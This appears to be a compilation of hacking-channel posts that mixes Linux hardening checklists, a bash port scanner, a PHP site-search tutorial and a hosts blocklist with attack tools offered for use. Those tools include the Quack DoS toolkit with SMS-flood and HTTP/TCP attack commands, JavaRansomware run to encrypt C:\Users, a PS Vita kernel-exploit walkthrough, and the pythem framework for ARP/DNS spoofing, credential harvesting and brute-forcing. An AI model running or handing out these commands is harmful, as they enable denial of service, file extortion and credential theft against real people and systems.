🦑 Undercode Cyber World!
@UndercodeCommunity


▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

🦑 Checking the system logs:
During the audit, make sure that the syslog daemon (syslogd, rsyslog or syslog-ng; on systemd hosts also journald) is running and that every significant event in the system is recorded in the event logs. Also verify that the log retention policy takes into account the requirements of current legislation and of the organisation's security policy, and that the log files are not writable by unprivileged users.

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Event logs on Linux:

/var/log/auth.log - authorization log (logins and the authentication mechanism); on Red Hat-based systems the same data is in /var/log/secure.
/var/log/dpkg.log - package install/remove log for dpkg (Debian/Ubuntu).
/var/log/yum.log - package install/remove log for yum (Red Hat/CentOS).
/var/log/faillog - failed login attempts and the failure limit for each account (binary; read with the faillog command).
/var/log/kern.log - kernel log (detailed messages from the Linux kernel).
/var/log/maillog or /var/log/mail.log - mail server log.
/var/log/wtmp - login records (time and duration of every user session; binary, read with last).
/var/run/utmp - users currently logged in to the system (binary, read with who or w).
/var/log/lastlog - last login of each account (binary, read with lastlog).
/var/log/boot (or /var/log/boot.log) - messages recorded during system boot.

On systemd hosts much of this is also available through journalctl (for example journalctl -u sshd or journalctl -k for the kernel ring buffer).

2) Protecting system files

> GRUB bootloader protection
To protect the legacy GRUB (0.9x) bootloader, the administrator generates an MD5 password hash:

[root@machine ~]# grub-md5-crypt

3) After the command has run, open /boot/grub/menu.lst or /boot/grub/grub.conf and add the hash on a password line:
[root@machine ~]# vi /boot/grub/menu.lst

or

[root@machine ~]# vi /boot/grub/grub.conf

4) The line takes the form password --md5 <hash> and must be placed in the global section, before the first title entry. On GRUB 2 systems (most current distributions) grub-md5-crypt no longer exists: generate the hash with grub-mkpasswd-pbkdf2, put set superusers and password_pbkdf2 lines in /etc/grub.d/40_custom, and regenerate grub.cfg with grub-mkconfig (grub2-mkconfig on Red Hat-based systems). In either case the password only prevents editing boot entries from the console; anyone with physical access to the disk can still bypass it, so it complements, and does not replace, full-disk encryption and a BIOS/UEFI password.

5) Protecting the /boot directory
During the audit, check the mount options of /boot, since the kernel and its related files live there. It should be mounted read-only so that these files cannot be modified in normal operation. Open /etc/fstab and check the entry:
# vi /etc/fstab

6) The file should contain a line such as:

LABEL=/boot /boot ext2 defaults,ro 1 2

Confirm the live state with mount | grep ' /boot ' (or findmnt /boot). Kernel and bootloader updates then require mount -o remount,rw /boot first and mount -o remount,ro /boot afterwards.

7) Checking open ports and active connections
The following script checks whether a named service is running and starts it if not; the service name is taken from the first argument:
#!/bin/bash
# Usage: check_service.sh <service-name>
service="${1:?usage: $0 <service-name>}"
if (( $(ps -ef | grep -v grep | grep -c "$service") > 0 )); then
    echo "$service is running!!!"
else
    /etc/init.d/"$service" start   # on systemd hosts: systemctl start "$service"
fi

🦑 View network connections

# netstat -anop
or
# lsof -i (lsof -ni to skip name resolution)
or
# iptraf

netstat belongs to the deprecated net-tools package; on current distributions use ss -anop (same switches) instead.

8) Listening ports
With netstat you can list every listening port together with the process that owns it:

# netstat -tulpn    (or: ss -tulpn)

A bash function for a quick TCP port scan (it uses bash's /dev/tcp pseudo-device, so it needs bash, and timeout from coreutils to bound each connection attempt):
# Usage: scan <host> <port | port,port,... | start-end>
scan() {
    if [[ -z $1 || -z $2 ]]; then
        echo "Usage: scan <host> <port, ports, or port-range>"
        return 1
    fi
    local host=$1
    local ports=()
    case $2 in
        *-*)
            IFS=- read -r start end <<< "$2"
            for ((port = start; port <= end; port++)); do
                ports+=("$port")
            done
            ;;
        *,*)
            IFS=, read -ra ports <<< "$2"
            ;;
        *)
            ports+=("$2")
            ;;
    esac
    for port in "${ports[@]}"; do
        # a successful connect means the port is open; timeout avoids hanging on filtered ports
        if timeout 1 bash -c "echo >/dev/tcp/$host/$port" 2>/dev/null; then
            echo "port $port is open"
        else
            echo "port $port is closed"
        fi
    done
}

9) iptables firewall

During the audit, check the configuration of the Linux firewall to prevent unauthorized access. To control traffic, iptables rules should filter incoming, outgoing and forwarded packets (the INPUT, OUTPUT and FORWARD chains) by IP address and TCP/UDP port number, with a default policy of DROP on INPUT and FORWARD. List the active rules with:

# iptables -n -L -v --line-numbers

On hosts that have moved to nftables, nft list ruleset shows the equivalent rule set.

ICMP / broadcast requests

10) During the audit, verify that the systems are configured to ignore ping and broadcast requests. Make sure that the following lines are present in /etc/sysctl.conf (apply them with sysctl -p and confirm the running value with sysctl net.ipv4.icmp_echo_ignore_all):

# ignore ICMP echo requests:
net.ipv4.icmp_echo_ignore_all = 1
# ignore broadcast (smurf) requests:
net.ipv4.icmp_echo_ignore_broadcasts = 1

Note that icmp_echo_ignore_all also breaks legitimate ping-based monitoring; icmp_echo_ignore_broadcasts is the setting that matters against smurf amplification.

11) Checking installed updates
The latest updates must be installed on the systems. On yum-based systems, list pending updates and then apply them with:
# yum check-update
# yum update
(On Debian/Ubuntu: apt update && apt list --upgradable, then apt upgrade.)
12) Checking cron jobs

The auditor should check who is allowed and who is forbidden to schedule tasks with cron. Access is controlled by /etc/cron.allow and /etc/cron.deny: if cron.allow exists, only the users listed in it may use cron; otherwise, users listed in cron.deny are refused. Both files hold one user name per line and know no "ALL" keyword, so the often-quoted

# echo ALL >> /etc/cron.deny

only denies a user literally named ALL. The reliable form is to remove cron.deny and create cron.allow containing just root (and do the same with at.allow/at.deny).

13) Checking SELinux enforcing status

During the audit, it is important to check the status of SELinux. This mechanism must be enabled on the system.
There are three SELinux modes:
Enforcing: the SELinux policy is enforced. SELinux denies access according to the policy rules.
Permissive: the policy is not enforced. SELinux does not block access, but denials are logged as actions that would have been blocked if the policy were enforced.
Disabled: SELinux is disabled. Only discretionary access control (DAC) rules apply.
During the audit, use the getenforce or sestatus commands (or system-config-selinux), or the following script, to check the SELinux status. Note that setenforce 0 switches to permissive mode only until the next reboot and does not disable SELinux; the persistent setting is SELINUX= in /etc/selinux/config, and an audit script should normally only report the mode rather than change it:
#!/bin/bash
# 1 = enforcing, 0 = permissive; the file is absent when SELinux is disabled
# (older kernels expose it as /selinux/enforce instead of /sys/fs/selinux/enforce)
ENABLED=$(cat /sys/fs/selinux/enforce 2>/dev/null)
if [ "$ENABLED" = "1" ]; then
    read -rp "SELinux is enforcing; switch to permissive? (yes/no): " disable
    if [ "$disable" = "yes" ]; then
        echo "switching SELinux to permissive mode"
        setenforce 0
    fi
else
    echo "SELinux is not enforcing (mode: $(getenforce 2>/dev/null || echo disabled))"
fi


🦑 LBSA script for checking basic security options
LBSA (Linux Basic Security Audit script) is a basic security configuration audit script for Linux systems. Run it from the command line with root privileges or, ideally, on a regular schedule from cron so that configuration changes are checked systematically.

» The purpose of the script is a quick audit of the security settings and a report describing the settings that could be changed to reach a higher degree of security. Where there is no recommendation for an option, the script prints a single line showing that the check was performed; the final decision is always up to the administrator. Before running it, the developers strongly recommend reading the manual and the recommended sections for more information.

Written by Underc0de
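The following script turns items 5), 10), 12) and 13) of the audit above into checks that can be run by hand or from cron. It is an added example written for this page, not part of the LBSA script or of any UnderCode tool; the sample fstab, sysctl.conf, cron.allow and enforce files are constructed inline so it runs offline, and in practice the functions are pointed at the real /etc/fstab, /etc/sysctl.conf, /etc/cron.allow and /sys/fs/selinux/enforce.

```shell
#!/bin/sh
# Added example: offline versions of the /boot, sysctl, cron and SELinux checks
# from the audit above. Every function takes a file path, so it can be pointed
# at the live /etc/fstab, /etc/sysctl.conf, /etc/cron.allow and
# /sys/fs/selinux/enforce, or at the constructed samples created below.

# fstab_boot_ro FSTAB: succeed only if the /boot entry carries the "ro" option.
fstab_boot_ro() {
    awk '$1 !~ /^#/ && $2 == "/boot" {
             n = split($4, opt, ",")
             for (i = 1; i <= n; i++) if (opt[i] == "ro") found = 1
         }
         END { if (found) exit 0; exit 1 }' "$1"
}

# sysctl_check FILE key=value...: print PASS/FAIL per key; succeed only if all match.
# The last assignment of a key in the file wins, as it does for sysctl itself.
sysctl_check() {
    file=$1; shift; rc=0
    for kv in "$@"; do
        key=${kv%%=*}; want=${kv#*=}
        have=$(awk -F= -v k="$key" '
            $0 !~ /^[ \t]*#/ { gsub(/[ \t]/, "", $1); gsub(/[ \t]/, "", $2)
                               if ($1 == k) v = $2 }
            END { print v }' "$file")
        if [ "$have" = "$want" ]; then
            echo "PASS $key = $have"
        else
            echo "FAIL $key: want $want, have ${have:-unset}"; rc=1
        fi
    done
    return $rc
}

# cron_allow_root_only CRON_ALLOW: succeed only if the file exists and lists just root.
# (cron.deny holds user names, so "echo ALL >> /etc/cron.deny" denies nobody.)
cron_allow_root_only() {
    [ -f "$1" ] && [ "$(sed '/^[[:space:]]*$/d' "$1" | sort -u | tr -d ' \t')" = "root" ]
}

# selinux_mode ENFORCE_FILE: print Enforcing/Permissive/Disabled; succeed only when enforcing.
# The enforce file is absent when SELinux is disabled, which is why a missing file maps to Disabled.
selinux_mode() {
    [ -r "$1" ] || { echo Disabled; return 1; }
    case $(cat "$1") in
        1) echo Enforcing ;;
        0) echo Permissive; return 1 ;;
        *) echo Unknown;    return 1 ;;
    esac
}

# --- constructed sample inputs (not real system state) ------------------------
tmp=$(mktemp -d)
cat > "$tmp/fstab" <<'EOF'
# constructed /etc/fstab
LABEL=/      /      ext4  defaults     1 1
LABEL=/boot  /boot  ext2  defaults,ro  1 2
EOF
cat > "$tmp/sysctl.conf" <<'EOF'
# constructed /etc/sysctl.conf: one setting correct, one still at the default
net.ipv4.icmp_echo_ignore_all = 1
net.ipv4.icmp_echo_ignore_broadcasts = 0
EOF
printf 'root\n' > "$tmp/cron.allow"
printf '1\n'    > "$tmp/enforce"

if fstab_boot_ro "$tmp/fstab"; then echo "PASS /boot is mounted read-only"; else echo "FAIL /boot is not ro"; fi
sysctl_check "$tmp/sysctl.conf" net.ipv4.icmp_echo_ignore_all=1 net.ipv4.icmp_echo_ignore_broadcasts=1 \
    || echo "FAIL sysctl hardening incomplete"
if cron_allow_root_only "$tmp/cron.allow"; then echo "PASS cron restricted to root"; else echo "FAIL cron.allow missing or too wide"; fi
echo "SELinux: $(selinux_mode "$tmp/enforce")"
```

The functions only read files, so the script can run as an unprivileged auditor against copies collected from the target hosts; every check returns a non-zero status on failure, which makes it usable from cron with mail-on-failure.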

🦑 2020 SMS attack tools:
> Quack Toolkit is a set of tools for performing denial-of-service attacks. It includes an SMS attack tool, an HTTP attack tool and several other attack tools.

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„•:

1) git clone https://github.com/entynetproject/quack

2) cd quack

3) chmod +x install.sh

4) ./install.sh


5) Run Quack Toolkit:
quack -h

6) usage: quack [-h] [--target <IP:port/URL/phone>]
[--tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]]
[--timeout <timeout>] [--threads <threads>] [-u]

7) optional arguments:
-h, --help show this help message and exit
--target <IP:port/URL/phone>
Target IP:port, URL or phone.
--tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]
Attack tool.
--timeout <timeout> Timeout in seconds.
--threads <threads> Threads count.
-u, --update Update Quack Toolkit.
Quack Toolkit examples (they abbreviate --timeout to --time, which argparse accepts because the prefix is unambiguous):
Example of the SMS attack:

quack --tool SMS --target 15554443333 --time 10 --threads 10
Example of the HTTP attack:

quack --tool HTTP --target http://example.com/ --time 10 --threads 10
Example of the TCP attack:

quack --tool TCP --target 192.168.1.100:80 --time 10 --threads 10

Tested by UndercOde


🦑 Build your own site search engine - website tutorial by Underc0de:

🦑 LETS START:

> Before you write a program, you need an idea. Here is mine; someone may have a better one, but this is only a question of method: walk through all files, read their content, search for the keyword, and put every match into an array.

> Before implementing these steps, I assume that your web pages are standard, that is, they have a title (<title></title>) and a body (<body></body>); if you design with Dreamweaver or FrontPage these tags are always present unless you deliberately delete them. Let's complete and improve this search engine step by step.

1) First, design the search form
Create search.htm in the root directory of the website with the following content (the form posts to search.php, which is created in the next step):
<html>
<head>
<title>Search form</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<form name="form1" method="post" action="search.php">
<table>
<tr>
<td width="36%">
<div align="center">
<input type="text" name="keyword">
</div>
</td>
<td width="64%">
<input type="submit" name="Submit" value="Search">
</td>
</tr>
</table>
</form>
</body>
</html>

2) Second, the search program
Create a search.php file in the root directory to process the data from the search.htm form. The content is as follows:
<?php
// Get the search keyword
$keyword = trim($_POST["keyword"] ?? "");
// Check whether it is empty
if ($keyword == "") {
    echo "The keyword you are searching for cannot be empty";
    exit; // End the program
}
?>


🦑 part 2 - Build your own site search engine
This way, if the keyword entered by the visitor is empty, a prompt is shown. Next comes iterating through all the files.

1) We can iterate through all the files recursively, using the functions opendir and readdir, or PHP's Directory class. We now use the former.
<?php
// function to traverse all files below $dir
function listFiles($dir) {
    $handle = opendir($dir);
    while (false !== ($file = readdir($handle))) {
        if ($file != "." && $file != "..") {
            // If it is a directory, continue searching inside it
            if (is_dir("$dir/$file")) {
                listFiles("$dir/$file");
            } else {
                // Process the file here
            }
        }
    }
    closedir($handle);
}
?>

2) In the marked place ("Process the file here") we can read and process each file found. Below, the file content is read and checked for the keyword $keyword; if it contains the keyword, the file path is appended to an array.
<?php
// $dir is the search directory, $keyword is the search keyword, and $array is the array that collects the matches
function listFiles($dir, $keyword, &$array) {
    $handle = opendir($dir);
    while (false !== ($file = readdir($handle))) {
        if ($file != "." && $file != "..") {
            if (is_dir("$dir/$file")) {
                listFiles("$dir/$file", $keyword, $array);
            } else {
                // skip the search script itself
                if ($file != "search.php") {
                    //@undercodeofficial
                    $data = file_get_contents("$dir/$file");
                    // keyword found: remember the file path
                    if (strpos($data, $keyword) !== false) {
                        $array[] = "$dir/$file";
                    }
                }
            }
        }
    }
    closedir($handle);
}
?>

3) Now combine this result with the program at the beginning, enter a keyword, and you will find that the relevant results on your website are found. We are perfecting it now.

Two points to keep in mind before putting this online: the function reads every file under the directory, including PHP sources, configuration files and anything else in the web root, so restrict it to the page types you actually want searchable (for example .htm and .html) and never let the visitor choose $dir; and when the results and the keyword are printed back, pass them through htmlspecialchars(), otherwise a crafted keyword becomes a reflected cross-site scripting payload.


🦑 Consolidated hosts-file blocklist (StevenBlack/hosts):
> Consolidates hosts files from several well-curated sources such as adaway.org, mvps.org, malwaredomainlist.com, someonewhocares.org and potentially others. You can optionally invoke extensions to block additional sites by category.

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„•:

1) git clone https://github.com/StevenBlack/hosts

2) cd hosts

3) pip3 install --user -r requirements.txt

4) python3 updateHostsFile.py [--auto] [--replace] [--ip nnn.nnn.nnn.nnn] [--extensions ext1 ext2 ext3]

🦑 Options:

>--help, or -h: display help.

--auto, or -a: run the script without prompting. When --auto is invoked:
  Hosts data sources, including extensions, are updated.
  No extensions are included by default. Use the --extensions or -e flag to include any you want.
  Your active hosts file is not replaced unless you include the --replace flag.

--backup, or -b: Make a backup of existing hosts file(s) as you generate over them.

--extensions <ext1> <ext2> <ext3>, or -e <ext1> <ext2> <ext3>: the names of subfolders below the extensions folder containing additional category-specific hosts files to include in the amalgamation. Example: --extensions porn or -e social porn.

--flush-dns-cache, or -f: skip the prompt for flushing the DNS cache. Only active when --replace is also active.

--ip nnn.nnn.nnn.nnn, or -i nnn.nnn.nnn.nnn: the IP address to use as the target. Default is 0.0.0.0.

--keepdomaincomments, or -k: true (default) or false, keep the comments that appear on the same line as domains. The default is true.

--noupdate, or -n: skip fetching updates from hosts data sources.

--output <subfolder>, or -o <subfolder>: place the generated source file in a subfolder. If the subfolder does not exist, it will be created.

--replace, or -r: replace your active hosts file with the generated one (needs root, e.g. sudo, since it writes /etc/hosts).

--skipstatichosts, or -s: false (default) or true, omit the standard section at the top, containing lines like 127.0.0.1 localhost. This is useful for configuring proximate DNS services on the local network.

--compress, or -c: false (default) or true, Compress the hosts file ignoring non-necessary lines (empty lines and comments) and putting multiple domains in each line. Reducing the number of lines of the hosts file improves the performances under Windows (with DNS Client service enabled).

--minimise, or -m: false (default) or true, like --compress, but puts each domain on a separate line. This is necessary because many implementations of URL blockers that rely on hosts files do not conform to the standard which allows multiple hosts on a single line.

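To make the amalgamation step concrete, here is a small shell version of what updateHostsFile.py does with its sources. It is an added example for this page, not code from the StevenBlack/hosts project: the two source files are constructed inline so it runs offline, the target address is the project's default 0.0.0.0, and the filter that drops the sources' own localhost-style lines is a choice made here (the project keeps its own static section at the top unless --skipstatichosts is given, which static_hosts reproduces).

```shell
#!/bin/sh
# Added example (not from StevenBlack/hosts): merge several hosts-format sources
# into one blocklist laid out like the project's --minimise output, one domain per line.
# merge_hosts TARGET_IP FILE...: strips comments, keeps only entries that point at a
# blocking address (0.0.0.0, 127.0.0.1, ::1), drops the sources' own localhost-style
# static entries, lower-cases every domain and de-duplicates, keeping first-seen order.
merge_hosts() {
    ip=$1; shift
    cat "$@" | awk -v ip="$ip" '
        { sub(/#.*/, "") }                                 # drop trailing comments
        NF < 2 { next }                                     # need "address host [host...]"
        $1 !~ /^(0\.0\.0\.0|127\.0\.0\.1|::1)$/ { next }    # ignore real host mappings
        {
            for (i = 2; i <= NF; i++) {
                h = tolower($i)
                if (h ~ /^(localhost|localhost\.localdomain|local|broadcasthost|ip6-localhost|ip6-loopback|ip6-localnet|ip6-mcastprefix|ip6-allnodes|ip6-allrouters)$/) continue
                if (!(h in seen)) { seen[h] = 1; order[++n] = h }
            }
        }
        END { for (i = 1; i <= n; i++) print ip, order[i] }'
}

# static_hosts: the standard section the tool writes at the top unless --skipstatichosts is given.
static_hosts() {
    printf '127.0.0.1 localhost\n127.0.0.1 localhost.localdomain\n127.0.0.1 local\n'
    printf '255.255.255.255 broadcasthost\n::1 localhost\n::1 ip6-localhost\n::1 ip6-loopback\n'
}

# hosts_blocks FILE DOMAIN: succeed if the generated file contains an entry for DOMAIN.
hosts_blocks() {
    grep -q "^[0-9a-fA-F.:]* $2$" "$1"
}

# --- constructed sample sources (nothing is downloaded) -----------------------
tmp=$(mktemp -d)
cat > "$tmp/source1" <<'EOF'
# adaway-style source (constructed)
127.0.0.1 localhost
127.0.0.1 ads.example.com   # banner network
127.0.0.1 Tracker.Example.net
EOF
cat > "$tmp/source2" <<'EOF'
# mvps-style source (constructed): one duplicate, one new entry, one static line
0.0.0.0 ads.example.com
0.0.0.0 malware.example.org
::1 ip6-localhost
EOF

{ static_hosts; merge_hosts 0.0.0.0 "$tmp/source1" "$tmp/source2"; } > "$tmp/hosts"
cat "$tmp/hosts"
```

Before copying the result over /etc/hosts, diff it against the current file and check with hosts_blocks that nothing your own systems depend on has been pulled in by a source; and remember that a hosts file only affects name resolution on that machine, so browsers using DNS over HTTPS and applications with hard-coded IP addresses are not blocked by it.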

🦑 JavaRansomware
Ransomware is malware for data kidnapping: the attacker encrypts the victim's data and stops the victim from using the PC. Ransomware spreads through e-mail attachments, infected programs and compromised websites. A ransomware program may also be called a cryptovirus, cryptotrojan or cryptoworm. It holds your PC or files for "ransom".

🦑 FEATURES:

Ransomware can:

1) Prevent you from accessing Windows.

2) Encrypt files so you can't use them.

3) Stop certain apps from running (like your web browser).

4) Ransomware will demand that you pay money (a β€œransom”) to get access to your PC or files. We have also seen them make you complete surveys.

5) There is no guarantee that paying the fine or doing what the ransomware tells you will give access to your PC or files again.

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„•:

1) git clone https://github.com/PanagiotisDrakatos/JavaRansomware

2) $ cd JarPath   (the directory that contains JavaRansomware.jar)

3) Encrypt all files below the given path; wait until execution has finished:
$ java -jar JavaRansomware.jar C:\Users Encrypt

4) Decrypt all files below the given path; wait until execution has finished:
$ java -jar JavaRansomware.jar C:\Users Decrypt


🦑 Updated fully chained kernel exploit (h-encore) for the PS Vita on firmwares 3.65-3.68


🦑 Requirements

1) Your device must be on firmware 3.65, 3.67 or 3.68. Firmware 3.69 and higher are not supported. If you're on a lower firmware, please decide carefully to what firmware you want to update, then search for a trustable guide on /r/vitahacks.

2) If your device is a phat OLED model, you need a Memory Card in order to install. There's no need for a Memory Card on Slim/PS TV models, since they already provide an Internal Storage. Make sure you have got at least 270 MB of free space.


3) Your device must be linked to any PSN account (it doesn't need to be activated though). If it is not, then you must restore default settings in order to sign in.

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„•:

1) Download https://github.com/TheOfficialFloW/h-encore/releases/download/v2.0/h-encore.zip
> extract it

2) Download and install qcma, psvimgtools and pkg2zip (check each project's releases section for the binaries).
If you don't know where to put the psvimgtools and pkg2zip binaries, just put them in the h-encore folder.
> https://codestation.github.io/qcma/
> https://github.com/yifanlu/psvimgtools
> https://github.com/mmozeiko/pkg2zip

3) Download the vulnerable DRM-free demo of bitter smile (yes, that's the user entry point).
> http://ares.dl.playstation.net/cdn/JP0741/PCSG90096_00/xGMrXOkORxWRyqzLMihZPqsXAbAXLzvAdJFqtPJLAZTgOcqJobxQAhLNbgiFydVlcmVOrpZKklOYxizQCRpiLfjeROuWivGXfwgkq.pkg

4) Extract the demo using this command in terminal/cmd:

pkg2zip -x PATH_OF_PKG
This will output the files to app/PCSG90096.

5) Copy the contents of the output app/PCSG90096 to the folder h-encore/app/ux0_temp_game_PCSG90096_app_PCSG90096 (such that the files eboot.bin and VITA_PATH.TXT are within the same folder).

6) Copy the license file app/PCSG90096/sce_sys/package/temp.bin to the folder
h-encore/license/ux0_temp_game_PCSG90096_license_app_PCSG90096 and rename the just pasted file temp.bin to 6488b73b912a753a492e2714e9b38bc7.rif. Be careful with the file extension, it should not be .rif.bin. Again, this file should be in the same folder as VITA_PATH.TXT.

7) Start qcma and within the qcma settings set the option Use this version for updates to FW 0.00 (Always up-to-date) to spoof the System Software check.

8) Launch Content Manager on your PS Vita and connect it to your computer, where you then need to select PC -> PS Vita System, and after that you select Applications. If you see an error message about System Software, you should simply reboot your device to solve it (if this doesn't solve, then put your device into airplane mode and reboot). If this does still not work, then alternatively set DNS to 212.47.229.76 to block updates. This should create a folder at PS Vita/APP/xxxxxxxxxxxxxxxx on your computer (see qcma settings where this folder is), where the folder xxxxxxxxxxxxxxxx represents the AID (account ID that is 16 characters long) that you need to insert here. If the AID is valid, it will yield a key that you can now use to encrypt the demo.

9) Change directory to the h-encore folder in terminal/cmd and use the key to encrypt all folders using (make sure you don't confuse the key with the AID, the key is 64 characters long!):

psvimg-create -n app -K YOUR_KEY app PCSG90096/app
psvimg-create -n appmeta -K YOUR_KEY appmeta PCSG90096/appmeta
psvimg-create -n license -K YOUR_KEY license PCSG90096/license
psvimg-create -n savedata -K YOUR_KEY savedata PCSG90096/savedata

10) The folder h-encore/PCSG90096 should then contain sce_sys and all 4 folders from above, and within these folders you should find files called X.psvimg and X.psvmd, where X has the same name as the folder. Backup this folder, since if everything has been done correctly, you don't need to redo all the steps to install it onto another device with the same PSN account.

11) Copy the folder h-encore/PCSG90096 to PS Vita/APP/xxxxxxxxxxxxxxxx/PCSG90096 and then select Refresh database in qcma.
The h-encore bubble with a size of around 243 MB should now appear in the Content Manager and that's what you finally need to transfer to your PS Vita. If the size does not match or you get the error C2-12858-4, then it's because you did not do it correctly! Please re-read the instructions more carefully then. If you get the error You can only copy applications that your account is the owner of, then it's because you have used an AID that is not of your account, go back to step 8.

12) Launch h-encore to exploit your device (if a message about trophies appears, simply click yes). The screen should first flash white, then purple, and finally open a menu called h-encore bootstrap menu where you can download VitaShell and install HENkaku. If it prompts the error Cannot start this application. C0-11136-2, then it's because you did not do step 6. correctly.

> Note that you have to relaunch the exploit everytime you reboot or shutdown your device. Of course if you only put your device into standby mode, you don't need to relaunch.


🦑 Updated penetration testing framework (pythem):

🦑 Features:

1) ARP spoofing - Man-in-the-middle.

2) ARP+DNS spoof - fake page redirect to credential harvester

3) DHCP ACK Injection spoofing - Man-in-the-middle

4) Man-in-the-middle inject BeEF hook

5) SSH Brute-Force attack.

6) Web page form brute-force

7) URL content buster

8) Overthrow the DNS of LAN range/IP address

9) Redirect all possible DNS queries to host

10) Get Shellcode from binary

11) Filter strings on pcap files

12) Exploit Development 1: Overwriting Instruction Pointer

13) Exploit Development 2: Ret2libc

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„•:

1) sudo apt-get update

2) sudo apt-get install -y build-essential python-dev python-pip tcpdump python-capstone \
   libnetfilter-queue-dev libffi-dev libssl-dev

🦑 With pip:
> sudo pip install pythem
With source and pip:

1) git clone https://github.com/m4n3dw0lf/pythem

2) cd pythem

3) sudo python setup.py sdist

4) sudo pip install dist/*

🦑 Running

1) Call it from a terminal (requires root privileges):
$ sudo pythem

2) Running as a Docker container (requires Docker):
docker run -it --net=host --rm --name pythem m4n3dw0lf/pythem



🦑 How to evaluate OS security (full) by UnderCode:

🦑 LETS START:

1) ---- With the development of the network, enterprises are connecting their local area network into a wide area network or their internal network into the Internet. This gives more and more people (internal and external) the opportunity to access internal network resources. As a result of this exposure, companies urgently need to address cybersecurity issues.

2) ---- A major part of providing effective security is assessing how well the existing security mechanisms are integrated with the company's network security policiesβ€”that is, determining whether the security policies are effectively implemented. The increasing complexity of the network makes it more and more difficult to implement security policies.

3) ---- Assessing the effectiveness of each network security component is necessary to ensure effective network security. The two main components that provide network security are: the firewall and the operating system (OS).

4) ---- Many companies focus their efforts on firewalls, and according to reports provided by the Aberdeen Group, the most vulnerable security holes are those that exist in the operating environment. Some vendors are committed to providing a reliable version of the operating environment, while most offer only optional, installable security services.

5) ---- The security mechanism of the operating system helps protect the machine running the OS from unauthorized access. Special protection is given against unauthorized access to specific information within the machine, to specific machine instructions, and to UNIX superuser commands. Most firewalls, and the Internet itself, are built on standard, unsecured UNIX operating environments, so nobody is surprised that security threats exist: UNIX as delivered is insecure and difficult to configure, and configuration errors lead to vulnerabilities.

🦑 The following two factors make the OS security mechanism very important:

1) A second line of defense is provided behind the firewall. Hackers often break through or bypass firewalls, and OS security policies can effectively protect the system against such intruders.

2) Defense against intruders inside the enterprise. Internal intruders are already inside the firewall, and FBI reports indicate that more than 60% of computer crimes originate from within the enterprise. In most cases the offenders are disgruntled employees or contractors.


🦑 Assessing OS security is quite difficult, especially for UNIX, because it has many variants and vendors. Assessing the security of a UNIX system requires proficiency in the following three areas:

🦑 LETS START:

1) Setting up a UNIX system

2) Weaknesses introduced by the various versions of UNIX applications, including sendmail, FTP, NFS (Network File System) and TFTP (Trivial File Transfer Protocol)

3) Security patches. The operating system is constantly being patched for bugs and gaining features, which complicates assessment, and these updates themselves introduce new security vulnerabilities. What is needed is a way to assess operating system vulnerabilities automatically and to enforce security policies automatically. Only in this way can the gap between security policy and security enforcement be effectively assessed and closed.

4) An OS security scanner provides exactly this. The scanning software runs on each machine and probes it through a series of tests to unearth potential weaknesses. It evaluates the stand-alone security environment from an operating system perspective and generates a detailed report of the vulnerabilities it finds, with proposed solutions.

5) System Security Scanner (S3) from ISS is a security assessment tool that facilitates the management and implementation of security policies. It enables enterprises to implement security policies across heterogeneous operating platforms. S3 supports most popular UNIX versions, including Linux, SunOS 4.1.3, Solaris, HP-UX and AIX. It helps companies automate security assessment and maintenance on their operating system platforms. With this tool, companies can use the full potential of their networks to increase their competitiveness without having to worry as much about security.


🦑 Introduction to common Linux network security tools by UnderCode

🦑 LETS START:

1) Although the various Linux distributions come with a lot of free open-source software, there are still many useful tools that are not installed by default.

2) In particular, their installation CDs include some toolkits that enhance Linux network security, and most of them are also open-source free software.

🦑 Here is a brief introduction to several tools that enhance Linux network security.

1) sudo
sudo is a program used by system administrators to allow some users to run some or all system commands as root. An obvious use is to enhance the security of the site. If you need to do some daily work as root and often execute a fixed set of commands that only root can run, then sudo is very suitable for you.
sudo's homepage is at: http://www.courtesan.com/courtesan/products/sudo/

2) Taking Red Hat as an example, the installation and setup process is as follows:

3) First, download the rpm package for Red Hat Linux from the sudo homepage.
It is at ftp://ftp.freshmeat.net/pub/rpms/sudo/ ; the latest stable version at the time was 1.5.9p4.

4) Execute #rpm -ivh sudo* to install, then edit the /etc/sudoers file with /usr/sbin/visudo.

5) If you are told that /usr/bin/vi cannot be found but you actually have vi in /bin, create a symbolic link with
ln -sf /bin/vi /usr/bin/vi
(Note: I ran into this on Red Hat 6.1; the problem does not exist on Red Hat 5.x.)

6) In addition, if some other error occurs, you may also need #chmod 700 /var/run/sudo

🦑 Below is my /etc/sudoers example file:
[root@sh-proxy /etc]# more sudoers
Host_Alias SERVER = sh-proxy

# User alias specification

User_Alias ADMIN = jephe, tome

# Cmnd alias specification

Cmnd_Alias SHUTDOWN = /etc/halt, /etc/shutdown, /etc/reboot

ADMIN SERVER = SHUTDOWN
jephe SERVER = /usr/bin/tail -f /var/log/maillog
jephe SERVER = /usr/bin/tail -f /var/log/messages

# User privilege specification
root ALL = (ALL) ALL
-----------

1) Since I often need to log in to the server remotely to watch the mail log /var/log/maillog, I added that line to /etc/sudoers so that I do not need to log in as root for my daily work, which improves safety. Always edit the file through visudo, which locks it and refuses to save a syntactically invalid sudoers (visudo -c checks an existing file); a broken sudoers locks every administrator out of sudo.

2) Sniffit
Sniffit is a well-known network sniffer. You can configure it to run in the background and capture the input/output of the TCP/IP ports you select.

